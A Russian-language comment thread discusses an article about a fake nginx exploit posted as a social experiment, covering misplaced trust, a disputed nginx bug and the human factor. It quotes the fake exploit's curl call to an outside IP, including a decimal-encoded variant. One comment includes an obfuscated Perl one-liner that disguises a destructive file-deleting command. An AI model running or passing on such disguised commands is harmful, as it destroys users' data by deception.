Успех социального эксперимента с поддельным эксплойтом для nginx

[4ekin]

Сам скрипт

curl 2.56.240.106

[worldmind]

Я правильно понял что человек имеющий репутацию специалиста по уязвимостями или лица публикующего таковые воспользовался своим авторитетом, чтобы обмануть массу некомпетентных людей доверившихся его репутации?

[diafour]

чтобы обмануть массу компетентных людей доверившихся его репутации?

поправил

[worldmind]

Думаю компетентных в подписчиках было меньшинство и они известны по именам, их и нужно проверять на то ретвитнули ли и с каким комментариями.

[shurup]

Уязвимость (в данном случае, по крайней мере) публиковал не автор, а упомянутая Алиса. Сам же автор оставил впечатление скорее "активно развлекающегося", чем с устоявшимся авторитетом. Хотя последователей в Twitter у него тоже действительно много.

[lega]

Вы про эту уязвимость? (которая не уязвимость).
Алиса, по видимому, тоже не проч похайповать, выдав не уязвимость за уязвимость.

[shurup]

Тем не менее, сама Алиса не согласна, что это «не уязвимость», и ответила ребятам из NGINX вот так:

However I suggest you to double-check the statement regarding general exploitability of a classical buffer overflow with potentially remote-controlled input data, before my more aggressive colleagues step in. ;)

[bolk]

Оказалось, что IP также можно конвертировать в шестнадцатеричный формат.

«Оказалось», омг :) Помню в далёком 2001-м прочитал об этом на ресурсе NNM: https://bolknote.ru/all/2971/. Думал, что за столько лет это стало широко известно. :)

[Serge3leo]

;) ;) Оказалось, что сия изначальная возможность прошлого века, стала ещё более хорошо забытой ;) ;)

[tossed]

А ещё в восьмеричной и даже десятичной.
Только серверу не нравится заголовок Host, подставляемый curl-ом, потому немного костылим:
curl 37285994 -HHost:H

[shurup]

С момента написания этой статьи твит notdan с поддельным эксплойтом (а если точнее, то весь его твиттер-аккаунт) перестал быть доступным для просмотра сторонним читателям (теперь только для «confirmed followers»).

[zorn_v]

понятное дело: чтобы их увидеть, люди выполняли код на своей машине

Патч Бармина?

[catharsis]

А когда-то просто запускали все незнакомые exe-шники

[iig]

Но сначала каждый exe проверяли антивирусом.

[zorn_v]

Вы из параллельной вселенной.
Всякие репаки иногда прямо пишут «отключите антивирус для установки игры» )

[iig]

Когда-то запускаЛИ, проверяЛИ. Я из прошлого пишу ;)

[QtRoS]

А я думал эффект будет обратным — после появления новости найдут сразу несколько уязвимостей (по аналогии с олимпийскими рекордами, которые сначала недостижимы, а потом покоряются сразу нескольким людям после обнародования).

[zorn_v]

Ну да, стоит чудаку написать «ВИНДА/ЛИНУПС/ФРЯХА — ДЫРА», сразу же «находят несколько уязвимостей». Просто потому что так написали )
Вы случайно не из тех кто вешает на стену плакаты «денег/машин/всех благ» потому что «мысли материальны… даже если ничего не делать»? ))

PS: Если сказать людям выполнить echo

"test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

и они ее выполнят, это уязвимость?

[diafour]

Это вирусная реклама статей про восстановление файлов.

[MrRitm]

ИМХО статья о том, что «специалисты» (и их большинство) не проверяют то, что запускают и не пытаются разобраться в сути. Т.е. получается системы уязвимы в большей степени из-за человеческого фактора чем из-за технических недоработок. Ну и плюс все такие важные и прошаренные — подписаны на тематические ветки\твитер-аккаунты и прочее. Видел таких. Гордятся тем, что регулярно получают рассылки со всяких форумов и намекают на то, что это типа для технической элиты и простым смертным не понять о чем там пишут.